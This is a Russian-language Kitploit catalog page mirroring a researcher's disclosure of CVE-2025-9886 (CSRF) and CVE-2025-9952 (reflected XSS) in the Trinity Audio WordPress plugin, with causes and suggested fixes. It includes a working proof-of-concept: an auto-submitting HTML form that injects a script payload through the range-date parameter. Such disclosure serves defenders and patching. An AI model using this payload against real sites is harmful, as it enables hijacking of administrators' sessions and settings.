Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Trinity-Audio-CVE-Report2 — Раскрытие информации для CVE-2025-9886 и CVE-2025-9952 | Kitploit
Инструменты/GitHubGitHub/mooseloveti/trinity-audio-cve-report2
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubmooseloveti/trinity-audio-cve-report2

Trinity-Audio-CVE-Report2

Раскрытие информации для CVE-2025-9886 и CVE-2025-9952

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Trinity-Audio-CVE-Отчет 2

Раскрытие информации о CVE-2025-9886 и CVE-2025-9952.

CVE-2025-9886 и CVE-2025-9952 - Уязвимость в Trinity Audio

Этот репозиторий раскрывает уязвимость, обнаруженную в Trinity Audio <= 5.20.1, плагине WordPress, разработанном sergiotrinity.

🛠 Затронутая версия

  • Продукт: Trinity Audio
  • Версия: v5.20.1
  • URL: https://wordpress.org/plugins/trinity-audio/

🔒 Назначенные CVE

Идентификатор CVEТипКомпонентВоздействие
CVE-2025-9886Межсайтовая подделка запроса (CSRF)admin/inc/post-management.phpМассовое включение/отключение Trinity Audio на записях в сессии жертвы
CVE-2025-9952Отражённый межсайтовый скриптинг (XSS)admin/inc/post-management.phpПроизвольное выполнение сценариев

🧾 Подробное описание

CVE-2025-9886 — Межсайтовая подделка запроса (CSRF)

  • Затронутый компонент: Обработчик страницы управления записями (admin/inc/post-management.php)

  • Вектор атаки: Междоменный POST-запрос к wp-admin/admin.php?page=trinity_audio_post_management

  • Триггер: Аутентифицированный администратор посещает страницу злоумышленника, которая автоматически отправляет специально созданную форму

  • Воздействие: Злоумышленник принудительно изменяет массовое состояние (включает/отключает Trinity Audio на всех записях или за период) с правами администратора, нарушая целостность и, возможно, доступность

CVE-2025-9952 — Межсайтовый скриптинг (XSS)

  • Затронутый компонент: Обработчик страницы управления записями (admin/inc/post-management.php)

  • Вектор атаки: Междоменный POST-запрос к wp-admin/admin.php?page=trinity_audio_post_management с параметрами post-management-action=activate-all-posts-range, range-before-after=after и корректной датой, за которой следует HTML.

  • Триггер: Аутентифицированный администратор посещает страницу злоумышленника, которая автоматически отправляет специально созданную форму. Должна существовать хотя бы одна запись, опубликованная после указанной даты.

  • Воздействие: Произвольный JavaScript выполняется в источнике администратора, что позволяет красть сессии, манипулировать настройками или объединять CSRF-атаки.

PoC

Объединив эти две уязвимости, злоумышленник может выполнить произвольные скрипты, направив пользователей на сайт, содержащий следующую форму.

  1. Администратор авторизован на целевом сайте.
  2. Злоумышленник размещает следующий HTML:
<form method="POST" action="https://victim.example.com/wp-admin/admin.php?page=trinity_audio_post_management">
  <input type="hidden" name="action" value="1">
  <input type="hidden" name="post-management-action" value="activate-all-posts-range">
  <input type="hidden" name="range-before-after" value="after">
  <input type="hidden" name="range-date" value="2025-09-03&lt;img src=x onerror=alert(document.domain)&gt;">
</form>
<script>document.forms[0].submit();</script>

❓Причина уязвимости

  • CSRF (CVE-2025-9886): Конечная точка, изменяющая состояние, принимает междоменные запросы без защиты CSRF. Отсутствует проверка nonce (check_admin_referer/wp_verify_nonce) и проверка Origin/Referer. Поскольку cookies отправляются автоматически, злоумышленник может выполнять действия в сессии аутентифицированного пользователя.

  • Отражённый XSS (CVE-2025-9952): Обработчик управления записями (admin/inc/post-management.php) вставляет значение параметра range-date из POST в уведомление об успехе без кодирования вывода (esc_html()/wp_kses()), что позволяет внедрить HTML/JS.

Предлагаемое исправление:

  • Требовать действительный CSRF-токен для всех запросов, изменяющих состояние: добавить wp_nonce_field(...) в формы и проверять с помощью check_admin_referer(...) или wp_verify_nonce(...).
  • Параметр range-date должен быть правильно экранирован перед отображением.

ひとこと

На первый взгляд это всего лишь CSRF и Self-XSS, но, объединив их, при успешной CSRF можно выполнить произвольный JavaScript. Создавать такой интересный PoC было забавно.

🔍 Обнаружил

Имя: MooseLove
Роль: Независимый исследователь безопасности / баг-хантер
Контакт: Доступен по запросу


📚 Ссылки

  • Продукт: https://wordpress.org/plugins/trinity-audio/

⚠️ Лицензия

Данное уведомление предоставлено для повышения осведомлённости о безопасности. Можно свободно распространять с указанием авторства.

Скачать инструмент